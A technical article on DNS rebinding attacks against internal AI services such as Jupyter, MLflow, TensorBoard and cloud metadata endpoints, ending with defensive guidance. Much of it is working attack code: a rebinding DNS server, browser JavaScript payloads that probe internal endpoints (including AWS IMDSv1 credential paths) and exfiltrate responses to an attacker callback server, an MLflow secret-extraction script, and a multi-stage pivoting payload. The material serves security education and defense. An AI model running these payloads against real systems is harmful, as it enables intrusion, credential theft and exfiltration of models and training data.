DNS Rebinding Attacks Against AI Services
Exploiting DNS rebinding to bypass network controls and access internal AI model serving endpoints, training dashboards, and GPU management interfaces
Overview
DNS rebinding is a class of attack that exploits the gap between DNS resolution and the browser's same-origin policy to access services on internal networks from a victim's browser. The attack works by serving a web page from a domain the attacker controls, then changing that domain's DNS record to resolve to an internal IP address. Because the browser considers subsequent requests to be to the "same origin" (same domain), it allows JavaScript on the page to read responses from the internal service.
AI infrastructure is particularly susceptible to DNS rebinding because many AI tools and services are designed as web applications that bind to all interfaces by default and lack Host header validation. Jupyter notebooks, TensorBoard instances, MLflow dashboards, Weights & Biases local servers, GPU monitoring tools (NVIDIA DCGM, Grafana dashboards), and model serving endpoints all commonly run on internal networks with the assumption that network segmentation provides sufficient protection. DNS rebinding pierces that assumption.
The impact of DNS rebinding against AI infrastructure ranges from information disclosure (reading model metrics, training configurations, experiment results) to full system compromise (executing code through Jupyter notebooks, registering malicious models through management APIs, accessing cloud credentials through metadata services). In multi-tenant GPU clusters, a successful DNS rebinding attack from one tenant's browser session could access another tenant's training infrastructure.
This article covers the mechanics of DNS rebinding in the context of AI services, demonstrates practical attacks against common AI tools, and provides defense strategies that AI platform teams should implement.
How DNS Rebinding Works
The Attack Mechanism
DNS rebinding exploits a fundamental timing issue in how browsers enforce the same-origin policy. The origin is determined by the protocol, hostname, and port — but the IP address that hostname resolves to can change between requests without violating the same-origin policy.
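This can be made concrete with a short sketch of a browser-style origin comparison: the tuple that defines an origin contains only the scheme, hostname, and port, and never the IP address the hostname currently resolves to.

```python
from urllib.parse import urlsplit

def origin(url: str) -> tuple[str, str, int]:
    """Return the (scheme, hostname, port) tuple that defines a URL's origin."""
    parts = urlsplit(url)
    default_ports = {"http": 80, "https": 443}
    port = parts.port or default_ports.get(parts.scheme, 0)
    return (parts.scheme, parts.hostname or "", port)

def same_origin(a: str, b: str) -> bool:
    """Same-origin check: the resolved IP address plays no part in it."""
    return origin(a) == origin(b)

# The browser treats these as the same origin regardless of whether
# evil.example.com currently resolves to 203.0.113.10 or 10.0.1.50:
assert same_origin("http://evil.example.com:8888/",
                   "http://evil.example.com:8888/api/kernels")
# A different port, however, is a different origin:
assert not same_origin("http://evil.example.com/", "http://evil.example.com:8888/")
```

Because the IP is invisible to this check, re-resolving the same hostname to an internal address keeps every request "same-origin" in the browser's eyes.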
The attack flow:
- The attacker registers a domain (e.g., evil.example.com) and controls its authoritative DNS server.
- The victim visits the attacker's page at http://evil.example.com:8888. The attacker serves the page on the same port as the target service, because the origin includes the port. The browser resolves the domain to the attacker's server IP (e.g., 203.0.113.10).
- The attacker's page loads JavaScript that will make subsequent requests to evil.example.com.
- The DNS record changes: the attacker's DNS server is configured with a very low TTL (e.g., 1 second), so when the browser re-resolves the domain, the server returns an internal IP address (e.g., 10.0.1.50, the address of an internal Jupyter server).
- JavaScript makes requests to http://evil.example.com:8888. The browser now resolves this to 10.0.1.50:8888 and sends the request. Because the origin (evil.example.com:8888) has not changed, the browser allows JavaScript to read the response.
- The attacker reads internal service data through the victim's browser, using it as a proxy into the internal network.
"""
DNS rebinding attack server for targeting internal AI services.
This implements:
1. A custom DNS server that alternates between external and internal IPs
2. An HTTP server that serves the attack payload
3. A callback receiver for exfiltrated data
WARNING: For authorized security testing only. Running DNS rebinding
attacks against systems without permission is illegal.
"""
import socket
import struct
import threading
import http.server
import json
import time
from dataclasses import dataclass
from typing import Optional
@dataclass
class RebindConfig:
"""Configuration for DNS rebinding attack."""
domain: str # Attacker-controlled domain
external_ip: str # Attacker's server IP
internal_ip: str # Target internal AI service IP
internal_port: int # Target service port
ttl: int = 1 # DNS TTL in seconds
rebind_after: int = 2 # Seconds before switching to internal IP
class DNSRebindServer:
"""
Minimal DNS server that returns external IP for initial queries
and internal IP for subsequent queries (after rebind_after seconds).
"""
def __init__(self, config: RebindConfig, listen_port: int = 53):
self.config = config
self.listen_port = listen_port
self.first_query_time: dict[str, float] = {}
def build_dns_response(
self,
query_data: bytes,
response_ip: str,
) -> bytes:
"""Build a minimal DNS A record response."""
# Parse query header
transaction_id = query_data[:2]
# Build response header
flags = b'\x81\x80' # Standard response, no error
questions = b'\x00\x01'
answers = b'\x00\x01'
authority = b'\x00\x00'
additional = b'\x00\x00'
header = transaction_id + flags + questions + answers + authority + additional
# Copy the question section from query
# Skip header (12 bytes), find end of question
question_end = 12
while query_data[question_end] != 0:
question_end += query_data[question_end] + 1
question_end += 5 # null byte + QTYPE(2) + QCLASS(2)
question = query_data[12:question_end]
# Build answer: pointer to name in question + A record
answer = b'\xc0\x0c' # Pointer to name in question section
answer += b'\x00\x01' # Type A
answer += b'\x00\x01' # Class IN
answer += struct.pack('>I', self.config.ttl) # TTL
answer += b'\x00\x04' # RDLENGTH
answer += socket.inet_aton(response_ip) # IP address
return header + question + answer
def handle_query(self, data: bytes, client_addr: tuple) -> bytes:
"""
Handle DNS query. Return external IP initially,
then switch to internal IP after rebind delay.
"""
client_key = f"{client_addr[0]}"
now = time.time()
if client_key not in self.first_query_time:
self.first_query_time[client_key] = now
elapsed = now - self.first_query_time[client_key]
if elapsed < self.config.rebind_after:
# First phase: return attacker's external IP
response_ip = self.config.external_ip
print(f"[DNS] {client_key}: Responding with external IP {response_ip}")
else:
# Rebind phase: return internal target IP
response_ip = self.config.internal_ip
print(f"[DNS] {client_key}: REBIND -> internal IP {response_ip}")
return self.build_dns_response(data, response_ip)
def serve(self) -> None:
"""Start the DNS server."""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', self.listen_port))
print(f"[DNS] Listening on port {self.listen_port}")
while True:
data, addr = sock.recvfrom(512)
try:
response = self.handle_query(data, addr)
sock.sendto(response, addr)
except Exception as e:
print(f"[DNS] Error handling query from {addr}: {e}")
def generate_attack_payload(config: RebindConfig) -> str:
"""
Generate the HTML/JavaScript payload served during the initial
connection that will execute after DNS rebinding occurs.
"""
return f"""<!DOCTYPE html>
<html>
<head><title>AI Security Assessment</title></head>
<body>
<div id="status">Initializing...</div>
<script>
const TARGET_PORT = {config.internal_port};
const REBIND_DELAY = {config.rebind_after * 1000 + 2000};
const CALLBACK_URL = "http://{config.external_ip}:9090/callback";
// Common AI service endpoints to probe after rebinding
const AI_ENDPOINTS = [
// Jupyter Notebook
{{path: "/api/sessions", name: "Jupyter Sessions"}},
{{path: "/api/kernels", name: "Jupyter Kernels"}},
{{path: "/api/contents", name: "Jupyter File Browser"}},
// MLflow
{{path: "/api/2.0/mlflow/experiments/list", name: "MLflow Experiments"}},
{{path: "/api/2.0/mlflow/registered-models/list", name: "MLflow Models"}},
// TensorBoard
{{path: "/data/runs", name: "TensorBoard Runs"}},
{{path: "/data/scalars", name: "TensorBoard Scalars"}},
// TorchServe Management
{{path: "/models", name: "TorchServe Models"}},
// Triton
{{path: "/v2", name: "Triton Server Info"}},
{{path: "/v2/repository/index", name: "Triton Model Repository"}},
// Prometheus/Grafana metrics
{{path: "/metrics", name: "Prometheus Metrics"}},
{{path: "/api/datasources", name: "Grafana Datasources"}},
// Cloud metadata (if accessible through rebinding)
{{path: "/latest/meta-data/iam/security-credentials/", name: "AWS IMDSv1"}},
];
function updateStatus(msg) {{
document.getElementById("status").innerText = msg;
console.log(msg);
}}
function exfiltrate(endpoint_name, data) {{
// Send discovered data back to attacker's callback server
fetch(CALLBACK_URL, {{
method: "POST",
mode: "no-cors",
            // Note: in "no-cors" mode, non-safelisted headers such as
            // Content-Type: application/json are silently dropped, so the
            // JSON body is sent with fetch's default text/plain content type.
body: JSON.stringify({{
endpoint: endpoint_name,
data: data,
timestamp: new Date().toISOString()
}})
}}).catch(() => {{}});
}}
async function probeEndpoint(endpoint) {{
try {{
const resp = await fetch(
`http://{config.domain}:${{TARGET_PORT}}${{endpoint.path}}`,
{{credentials: "omit"}}
);
if (resp.ok) {{
const text = await resp.text();
updateStatus(`Found: ${{endpoint.name}}`);
exfiltrate(endpoint.name, text.substring(0, 10000));
return {{name: endpoint.name, status: resp.status, data: text}};
}}
}} catch(e) {{
// Connection refused or CORS error — endpoint not available
}}
return null;
}}
async function runAttack() {{
updateStatus("Waiting for DNS rebinding...");
// Wait for DNS cache to expire and rebind to internal IP
await new Promise(resolve => setTimeout(resolve, REBIND_DELAY));
updateStatus("DNS rebind complete. Probing internal services...");
const results = [];
for (const endpoint of AI_ENDPOINTS) {{
const result = await probeEndpoint(endpoint);
if (result) {{
results.push(result);
}}
}}
updateStatus(`Scan complete. Found ${{results.length}} accessible endpoints.`);
exfiltrate("scan_summary", JSON.stringify(results.map(r => r.name)));
}}
// Start attack after page loads
runAttack();
</script>
</body>
</html>"""
class CallbackServer(http.server.BaseHTTPRequestHandler):
"""HTTP server to receive exfiltrated data from DNS rebinding attack."""
collected_data: list = []
def do_POST(self):
content_length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_length)
try:
data = json.loads(body)
CallbackServer.collected_data.append(data)
print(f"[CALLBACK] Received: {data.get('endpoint', 'unknown')}")
except json.JSONDecodeError:
print(f"[CALLBACK] Raw data: {body[:200]}")
self.send_response(200)
self.end_headers()
def log_message(self, format, *args):
pass # Suppress default logging
if __name__ == "__main__":
import sys
if len(sys.argv) != 4:
print(
f"Usage: {sys.argv[0]} <domain> <internal_ip> <internal_port>\n"
f"Example: {sys.argv[0]} evil.example.com 10.0.1.50 8888"
)
sys.exit(1)
config = RebindConfig(
domain=sys.argv[1],
        external_ip="0.0.0.0",  # Replace with the attacker server's public IP
internal_ip=sys.argv[2],
internal_port=int(sys.argv[3]),
)
# Generate and save the attack payload
payload = generate_attack_payload(config)
with open("index.html", "w") as f:
f.write(payload)
    print("[*] Attack payload written to index.html")
    print(f"[*] Target: {config.internal_ip}:{config.internal_port}")
    print("[*] Start DNS server on port 53 and HTTP server on port 80")

Vulnerable AI Service Configurations
Jupyter Notebooks
Jupyter is one of the most common targets for DNS rebinding in AI environments. By default, Jupyter Notebook and JupyterLab bind to localhost and require token-based authentication. In practice, however, many deployments bind to 0.0.0.0 and disable token authentication for convenience (especially in Docker containers and Kubernetes pods), relying on network isolation instead.
A successful DNS rebinding attack against a Jupyter instance provides:
- Remote code execution: The Jupyter API allows creating and executing kernels with arbitrary code.
- File system access: The contents API provides read/write access to the server's filesystem.
- Credential theft: Notebooks often contain inline credentials, API keys, and cloud configuration.
The attack is particularly effective because Jupyter does not validate the Host header by default, and its REST API returns JSON responses that are easily parsed by JavaScript after rebinding.
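As a sketch of how little post-processing the attacker needs, the following reduces a /api/sessions response to its interesting fields. It is written in Python for readability; the browser payload would do the same in JavaScript. The response shape follows the Jupyter Server REST API, and the example values are invented.

```python
def summarize_jupyter_sessions(sessions_json: list[dict]) -> list[dict]:
    """Reduce a Jupyter /api/sessions response to the fields an attacker
    cares about: which notebooks are open and which kernels are live."""
    summary = []
    for s in sessions_json:
        summary.append({
            # Older Jupyter versions nest the path under "notebook"
            "notebook_path": s.get("path") or s.get("notebook", {}).get("path"),
            "kernel_id": s.get("kernel", {}).get("id"),
            "kernel_name": s.get("kernel", {}).get("name"),
        })
    return summary

# Illustrative response body, shaped like the Jupyter Server REST API:
example = [{
    "id": "a1b2", "path": "train_llm.ipynb", "type": "notebook",
    "kernel": {"id": "k-123", "name": "python3", "execution_state": "idle"},
}]
assert summarize_jupyter_sessions(example) == [
    {"notebook_path": "train_llm.ipynb", "kernel_id": "k-123",
     "kernel_name": "python3"}
]
```

The kernel_id recovered here is exactly what the attacker needs to open a WebSocket channel to the kernel in the next step.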
MLflow Tracking Server
MLflow's tracking server exposes a REST API for logging experiments, metrics, parameters, and artifacts. It typically runs without authentication on internal networks. Through DNS rebinding, an attacker can:
- Enumerate all experiments and model runs
- Download model artifacts (including model weights)
- Read logged parameters that may contain hyperparameters, dataset paths, or configuration secrets
- Register new models or modify existing model stages
GPU Management Interfaces
NVIDIA's Data Center GPU Manager (DCGM) and associated monitoring tools like DCGM Exporter expose metrics via HTTP. While metrics may seem low-risk, they reveal:
- GPU utilization patterns that indicate when training jobs run
- Memory usage that reveals model sizes
- Error rates that may indicate vulnerability to fault injection
- Topology information about the GPU cluster
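As an illustration, a rebinding payload that reaches a DCGM exporter only has to parse Prometheus exposition format. A minimal sketch follows; metric names follow the exporter's DCGM_FI_DEV_* convention, and the sample text is invented.

```python
import re

# One Prometheus sample line: name, optional {label="value",...}, value
METRIC_LINE = re.compile(
    r'^(?P<name>[A-Za-z_:][A-Za-z0-9_:]*)'   # metric name
    r'(?:\{(?P<labels>[^}]*)\})?'            # optional label set
    r'\s+(?P<value>[-+0-9.eE]+)\s*$'         # sample value
)

def parse_gpu_metrics(text: str, prefix: str = "DCGM_FI_DEV_") -> dict:
    """Extract DCGM-style gauges from Prometheus exposition format.

    Returns {metric_name: [(labels_dict, value), ...]} for metrics whose
    name starts with `prefix`. Comment lines (#) are skipped. Label values
    containing commas are not handled; this is a sketch, not a full parser.
    """
    results: dict = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = METRIC_LINE.match(line)
        if not m or not m.group("name").startswith(prefix):
            continue
        labels = {}
        for pair in (m.group("labels") or "").split(","):
            if "=" in pair:
                k, v = pair.split("=", 1)
                labels[k.strip()] = v.strip().strip('"')
        results.setdefault(m.group("name"), []).append(
            (labels, float(m.group("value")))
        )
    return results

sample = """
# HELP DCGM_FI_DEV_GPU_UTIL GPU utilization (in %).
DCGM_FI_DEV_GPU_UTIL{gpu="0",modelName="A100-SXM4-80GB"} 97
DCGM_FI_DEV_FB_USED{gpu="0",modelName="A100-SXM4-80GB"} 67584
"""
metrics = parse_gpu_metrics(sample)
assert metrics["DCGM_FI_DEV_GPU_UTIL"][0][1] == 97.0  # busy GPU: a job is running
```

From a handful of such gauges an observer learns the GPU model, how much framebuffer a job occupies (a proxy for model size), and when training runs start and stop.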
Practical Examples
Targeted Attack Against Internal MLflow
"""
Post-rebinding exploitation script for MLflow tracking server.
After DNS rebinding succeeds, this code (running in the victim's
browser context) extracts experiment data and model artifacts.
This Python version demonstrates the same logic that would run
as JavaScript in the browser payload.
"""
import requests
from typing import Any
class MLflowExfiltrator:
"""
Extract data from an MLflow tracking server accessed
via DNS rebinding (or direct access in testing).
"""
def __init__(self, base_url: str):
self.base_url = base_url.rstrip("/")
self.session = requests.Session()
def list_experiments(self) -> list[dict]:
"""List all experiments in the MLflow instance."""
resp = self.session.get(
f"{self.base_url}/api/2.0/mlflow/experiments/search",
params={"max_results": 1000},
)
resp.raise_for_status()
return resp.json().get("experiments", [])
def get_runs(self, experiment_id: str) -> list[dict]:
"""Get all runs for an experiment."""
resp = self.session.post(
f"{self.base_url}/api/2.0/mlflow/runs/search",
json={
"experiment_ids": [experiment_id],
"max_results": 1000,
},
)
resp.raise_for_status()
return resp.json().get("runs", [])
def extract_sensitive_params(
self, runs: list[dict]
) -> list[dict]:
"""
Extract parameters that may contain sensitive information
such as data paths, API keys, or connection strings.
"""
sensitive_patterns = [
"password", "secret", "key", "token", "credential",
"connection_string", "database", "s3://", "gs://",
"azure", "endpoint", "api_key",
]
sensitive_findings = []
for run in runs:
run_id = run.get("info", {}).get("run_id", "unknown")
params = run.get("data", {}).get("params", [])
for param in params:
key = param.get("key", "").lower()
value = param.get("value", "")
for pattern in sensitive_patterns:
if pattern in key or pattern in value.lower():
sensitive_findings.append({
"run_id": run_id,
"param_key": param["key"],
"param_value": value,
"matched_pattern": pattern,
})
break
return sensitive_findings
def list_registered_models(self) -> list[dict]:
"""List all registered models."""
resp = self.session.get(
f"{self.base_url}/api/2.0/mlflow/registered-models/list",
params={"max_results": 1000},
)
resp.raise_for_status()
return resp.json().get("registered_models", [])
def full_extraction(self) -> dict[str, Any]:
"""Run full extraction against the MLflow instance."""
results: dict[str, Any] = {
"experiments": [],
"sensitive_params": [],
"registered_models": [],
}
experiments = self.list_experiments()
results["experiments"] = [
{"id": e.get("experiment_id"), "name": e.get("name")}
for e in experiments
]
for exp in experiments:
exp_id = exp.get("experiment_id")
if exp_id:
runs = self.get_runs(exp_id)
sensitive = self.extract_sensitive_params(runs)
results["sensitive_params"].extend(sensitive)
results["registered_models"] = self.list_registered_models()
return results
if __name__ == "__main__":
import sys
import json
url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"
extractor = MLflowExfiltrator(url)
try:
results = extractor.full_extraction()
print(json.dumps(results, indent=2, default=str))
except requests.ConnectionError:
print(f"Could not connect to MLflow at {url}")
except Exception as e:
        print(f"Error during extraction: {e}")

Advanced Attack Scenarios
Chaining DNS Rebinding with Cloud Metadata Services
One of the most impactful DNS rebinding attack chains targets cloud metadata services through AI infrastructure. When an AI service runs on a cloud instance (EC2, GCE, Azure VM), the instance metadata service is accessible at the well-known link-local address 169.254.169.254 on AWS, GCP, and Azure alike. DNS rebinding can be used to reach this endpoint through the victim's browser, even if the attacker cannot directly reach the AI service.
The attack chain works as follows: the attacker's DNS rebinding payload first rebinds to an internal AI service (such as a Jupyter notebook on 10.0.1.50). If that service is not vulnerable or not interesting, the payload can rebind again to the cloud metadata service at 169.254.169.254. AWS IMDSv1 does not require any special headers, so a simple GET request from the rebound domain can retrieve instance credentials, including IAM role credentials that may grant broad access to S3 buckets containing training data and model artifacts. (Because the metadata address is link-local, this stage only works when the victim's browser itself runs on the cloud instance, for example in a browser-based cloud workstation or remote notebook environment.)
AWS IMDSv2 mitigates this by requiring a session token obtained through a PUT request with the X-aws-ec2-metadata-token-ttl-seconds header, a request browser JavaScript cannot issue cross-origin without a CORS preflight that the metadata service will never answer. However, many AI deployments still run IMDSv1 or have misconfigured their instance metadata options. GCP and Azure have comparable header-based protections (Metadata-Flavor: Google and Metadata: true, respectively) that may or may not be enforced.
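The IMDSv2 handshake can be sketched as pure request construction. The header names and endpoint paths are AWS's documented ones; no network calls are made here.

```python
def imdsv2_token_request(ttl_seconds: int = 21600) -> tuple[str, str, dict]:
    """Step 1: PUT to the token endpoint; the response body is the session token."""
    return (
        "PUT",
        "http://169.254.169.254/latest/api/token",
        {"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )

def imdsv2_metadata_request(
    token: str,
    path: str = "meta-data/iam/security-credentials/",
) -> tuple[str, str, dict]:
    """Step 2: GET metadata, presenting the session token in a header.

    A DNS rebinding payload running in a browser cannot perform this
    handshake: the PUT with a custom header triggers a CORS preflight,
    and the metadata service never answers preflights.
    """
    return (
        "GET",
        f"http://169.254.169.254/latest/{path}",
        {"X-aws-ec2-metadata-token": token},
    )
```

Auditing that every instance in an AI cluster has HttpTokens set to "required" (so the step-1 token is mandatory) closes the IMDSv1 path described above.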
Attacking Jupyter Notebooks via DNS Rebinding
Jupyter notebooks are particularly valuable DNS rebinding targets because they provide full code execution capability. The attack proceeds through the Jupyter REST API:
- After DNS rebinding resolves the domain to the internal Jupyter server, the attacker's JavaScript calls /api/sessions to list active sessions.
- If no kernel is running, the attacker creates a new kernel via POST /api/kernels.
- The attacker sends code-execution requests over the WebSocket connection to the kernel. WebSocket connections established after the DNS rebind inherit the rebound resolution, allowing real-time code execution.
- Through the kernel, the attacker can read files from the filesystem (including training data, model weights, and configuration files containing credentials), install backdoors, or pivot to other internal services.
The WebSocket-based kernel communication is particularly dangerous because it provides a persistent, bidirectional channel after the initial rebinding succeeds. Even if the DNS rebinds back to the external IP, existing WebSocket connections remain active.
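For reference, the execute_request message an attacker would send over the kernel WebSocket looks roughly like the following. The envelope fields (header, parent_header, metadata, content) are defined by the Jupyter messaging protocol; the protocol version and the code string here are illustrative.

```python
import json
import uuid
from datetime import datetime, timezone

def jupyter_execute_request(code: str, session_id: str) -> str:
    """Build a Jupyter-protocol execute_request message, serialized as the
    JSON frame sent over a kernel WebSocket channel."""
    message = {
        "header": {
            "msg_id": str(uuid.uuid4()),
            "username": "",
            "session": session_id,
            "msg_type": "execute_request",
            "version": "5.3",  # protocol version, illustrative
            "date": datetime.now(timezone.utc).isoformat(),
        },
        "parent_header": {},
        "metadata": {},
        "content": {
            "code": code,            # arbitrary code executed by the kernel
            "silent": False,
            "store_history": False,  # avoid leaving traces in history
            "user_expressions": {},
            "allow_stdin": False,
        },
        "channel": "shell",  # channel multiplexing field used by Jupyter Server
    }
    return json.dumps(message)
```

A single such frame is the entire cost of remote code execution once the WebSocket is open, which is why Origin validation on the upgrade request (discussed under defenses) matters so much.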
Browser-Based GPU Access
In some AI development environments, GPU monitoring interfaces (NVIDIA GPU Cloud dashboards, Jupyter with GPU extensions, Gradio demo interfaces) are exposed on internal networks. DNS rebinding to these interfaces can reveal detailed GPU utilization, running processes, and memory usage. While this is primarily an information disclosure issue, the leaked data can reveal model architectures, training progress, and the identities of users running GPU workloads, all valuable reconnaissance for further attacks.
Multi-Stage Rebinding for Network Pivoting
Sophisticated attackers may use multiple rounds of DNS rebinding to pivot through an AI infrastructure network. The first rebind reaches an external-facing service like a model demo (Gradio, Streamlit). The second rebind uses information gathered from the first stage to target internal infrastructure like the model registry or training data storage. Each stage provides new information about the internal network topology and service locations.
"""
Multi-stage DNS rebinding orchestrator for AI infrastructure pivoting.
Coordinates multiple rebinding rounds to progressively access
deeper internal services.
"""
import json
import time
from typing import Optional
from dataclasses import dataclass, field
@dataclass
class RebindStage:
"""Configuration for one stage of multi-stage rebinding."""
name: str
target_ip: str
target_port: int
endpoints_to_probe: list[str]
data_to_extract: list[str]
next_stage_info: Optional[str] = None # Info to look for to plan next stage
@dataclass
class PivotPlan:
"""Multi-stage rebinding attack plan."""
stages: list[RebindStage] = field(default_factory=list)
def add_stage(self, stage: RebindStage) -> None:
self.stages.append(stage)
def generate_payload(self, callback_url: str) -> str:
"""Generate JavaScript payload that executes all stages sequentially."""
stages_json = json.dumps([
{
"name": s.name,
"ip": s.target_ip,
"port": s.target_port,
"endpoints": s.endpoints_to_probe,
"extract": s.data_to_extract,
}
for s in self.stages
])
return f"""
// Multi-stage DNS rebinding payload
const STAGES = {stages_json};
const CALLBACK = "{callback_url}";
let stageResults = {{}};
async function executeStage(stage, stageIndex) {{
console.log(`Executing stage ${{stageIndex}}: ${{stage.name}}`);
// Signal DNS server to rebind to this stage's target
    await fetch(`${{CALLBACK}}/rebind?ip=${{stage.ip}}&port=${{stage.port}}`, {{mode: 'no-cors'}});
// Wait for DNS cache to expire
await new Promise(r => setTimeout(r, 3000));
let results = {{}};
for (const endpoint of stage.endpoints) {{
try {{
const resp = await fetch(
`http://${{window.location.hostname}}:${{stage.port}}${{endpoint}}`,
{{credentials: 'omit'}}
);
if (resp.ok) {{
results[endpoint] = await resp.text();
}}
}} catch(e) {{}}
}}
stageResults[stage.name] = results;
// Send results back to attacker
await fetch(`${{CALLBACK}}/results`, {{
method: 'POST',
mode: 'no-cors',
body: JSON.stringify({{stage: stage.name, data: results}})
}});
return results;
}}
async function runAllStages() {{
for (let i = 0; i < STAGES.length; i++) {{
await executeStage(STAGES[i], i);
}}
}}
runAllStages();
"""
def create_ai_infrastructure_pivot_plan() -> PivotPlan:
"""
Create a pivot plan for typical AI infrastructure layout.
Stage 1: Reconnaissance via exposed demo/dashboard
Stage 2: Access model registry for model enumeration
Stage 3: Access training data storage metadata
"""
plan = PivotPlan()
plan.add_stage(RebindStage(
name="recon_dashboard",
target_ip="10.0.1.10",
target_port=3000,
endpoints_to_probe=[
"/api/datasources", # Grafana datasources reveal internal services
"/api/search", # Grafana dashboards reveal infrastructure
],
data_to_extract=["datasource_urls", "dashboard_names"],
next_stage_info="Look for MLflow/model registry URLs in datasources",
))
plan.add_stage(RebindStage(
name="model_registry",
target_ip="10.0.1.20",
target_port=5000,
endpoints_to_probe=[
"/api/2.0/mlflow/experiments/list",
"/api/2.0/mlflow/registered-models/list",
],
data_to_extract=["experiment_names", "model_artifacts_locations"],
next_stage_info="Extract S3/GCS paths from artifact locations",
))
plan.add_stage(RebindStage(
name="jupyter_rce",
target_ip="10.0.1.30",
target_port=8888,
endpoints_to_probe=[
"/api/sessions",
"/api/kernels",
"/api/contents",
],
data_to_extract=["running_notebooks", "filesystem_listing"],
))
    return plan

Defense and Mitigation
Host header validation is the most direct defense against DNS rebinding. Every AI service should validate that the HTTP Host header matches expected values and reject requests with unexpected hosts:
"""
Middleware for Host header validation in AI services.
Drop-in protection against DNS rebinding attacks.
"""
from functools import wraps
from typing import Callable, Optional
import ipaddress
class HostHeaderValidator:
"""
Validates HTTP Host headers to prevent DNS rebinding.
Allows requests only from explicitly permitted hostnames.
"""
def __init__(
self,
allowed_hosts: list[str],
allow_ip_access: bool = False,
):
"""
Args:
allowed_hosts: List of allowed hostnames
(e.g., ["mlflow.internal.company.com", "localhost"])
allow_ip_access: Whether to allow direct IP access.
Should be False in production.
"""
self.allowed_hosts = set(
h.lower().strip() for h in allowed_hosts
)
self.allow_ip_access = allow_ip_access
def is_valid_host(self, host_header: str) -> bool:
"""Check if the Host header value is allowed."""
if not host_header:
return False
        # Strip port if present (handle bracketed IPv6 literals)
        host = host_header.lower().strip()
        if host.startswith("[") and "]" in host:
            host = host[1:host.index("]")]
        else:
            host = host.split(":")[0]
# Check against allowed list
if host in self.allowed_hosts:
return True
# Optionally allow direct IP access (for development)
if self.allow_ip_access:
try:
ipaddress.ip_address(host)
return True
except ValueError:
pass
return False
def flask_middleware(self, app):
"""Flask middleware for Host header validation."""
from flask import request, abort
@app.before_request
def check_host():
host = request.host
if not self.is_valid_host(host):
abort(403, f"Host header '{host}' not allowed")
return app
def fastapi_middleware(self):
"""FastAPI/Starlette middleware for Host header validation."""
from starlette.middleware.base import (
BaseHTTPMiddleware,
)
from starlette.responses import Response
validator = self
class HostValidationMiddleware(BaseHTTPMiddleware):
async def dispatch(self, request, call_next):
host = request.headers.get("host", "")
if not validator.is_valid_host(host):
return Response(
content=f"Host header '{host}' not allowed",
status_code=403,
)
return await call_next(request)
        return HostValidationMiddleware

DNS pinning and rebinding protection at the infrastructure level:
- Configure DNS resolvers to reject private IP addresses in responses for external domains (DNS rebinding protection in dnsmasq, Unbound, or cloud DNS).
- Use browser-level protections where available (Private Network Access specification in Chromium).
- Deploy internal services with TLS certificates that are validated by clients — a DNS-rebound domain will not have a valid certificate for the internal service hostname.
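For example, dnsmasq ships the relevant protections as configuration flags; the allowlisted internal zone below is illustrative.

```
# /etc/dnsmasq.conf -- DNS rebinding protection
stop-dns-rebind                          # reject upstream answers in private IP ranges
rebind-localhost-ok                      # still allow 127.0.0.0/8 answers (some DNSBLs use them)
rebind-domain-ok=/internal.example.com/  # allowlist a genuinely split-horizon internal zone
```

With stop-dns-rebind active, the rebind step of the attack fails at the resolver: the answer pointing evil.example.com at 10.0.1.50 is simply dropped.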
Network-level defenses:
- Bind AI services to specific internal interfaces, not 0.0.0.0.
- Require authentication for all AI tools, even on internal networks. Jupyter should always require tokens; MLflow should sit behind an authenticating proxy.
- Use IMDSv2 (token-required) for AWS cloud metadata to prevent SSRF and rebinding-based metadata theft.
- Implement egress filtering to prevent internal services from connecting to attacker-controlled domains.
Browser isolation for AI development: Consider deploying browser isolation solutions for teams that regularly access internal AI dashboards and notebooks. Browser isolation runs the browser rendering engine in a remote sandbox, preventing the local browser from directly accessing internal network resources. This eliminates DNS rebinding as an attack vector because the rebound requests originate from the isolation service's network, not the internal AI network.
WebSocket security: Since many AI services use WebSockets (Jupyter kernels, streaming inference, real-time monitoring dashboards), implement WebSocket-specific protections against DNS rebinding. Validate the Origin header on WebSocket upgrade requests, require authentication tokens in the WebSocket handshake (not just the initial HTTP request), and implement per-connection rate limiting.
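A minimal sketch of the Origin check on the WebSocket upgrade, assuming the allowlist comes from deployment configuration; the hostnames below are placeholders.

```python
from typing import Optional
from urllib.parse import urlsplit

def is_allowed_ws_origin(origin_header: Optional[str],
                         allowed_hosts: set[str]) -> bool:
    """Validate the Origin header of a WebSocket upgrade request.

    Rejects missing origins and any origin whose hostname is not in the
    allowlist. After a DNS rebind, the page's Origin is still the
    attacker's domain, so this check blocks the kernel channel even
    though the TCP connection reaches the internal service.
    """
    if not origin_header:
        return False
    parts = urlsplit(origin_header)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    return parts.hostname in allowed_hosts  # urlsplit lowercases hostnames

ALLOWED = {"jupyter.internal.example.com", "localhost"}
assert is_allowed_ws_origin("https://jupyter.internal.example.com", ALLOWED)
assert not is_allowed_ws_origin("http://evil.example.com", ALLOWED)  # rebound page
assert not is_allowed_ws_origin(None, ALLOWED)
```

The same predicate belongs in the plain-HTTP Host validator's WebSocket counterpart: Host checks stop rebound HTTP requests, Origin checks stop rebound upgrade requests.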
Service discovery hardening: In environments using service discovery (Consul, CoreDNS, Kubernetes DNS), ensure that internal service names are not resolvable from external networks. DNS rebinding is only effective if the attacker knows the internal IP addresses or hostnames of target services. Minimize information disclosure from public-facing services that could reveal internal topology.
References
- Dorsey, B. (2018). "Attacking Private Networks from the Internet with DNS Rebinding." https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325
- NCC Group. "Singularity of Origin: A DNS Rebinding Attack Framework." https://github.com/nccgroup/singularity
- OWASP. (2024). "DNS Rebinding." OWASP Web Security Testing Guide. https://owasp.org/www-community/attacks/DNS_Rebinding
- MITRE ATLAS. "Initial Access via Web-based Exploitation of ML Services." https://atlas.mitre.org/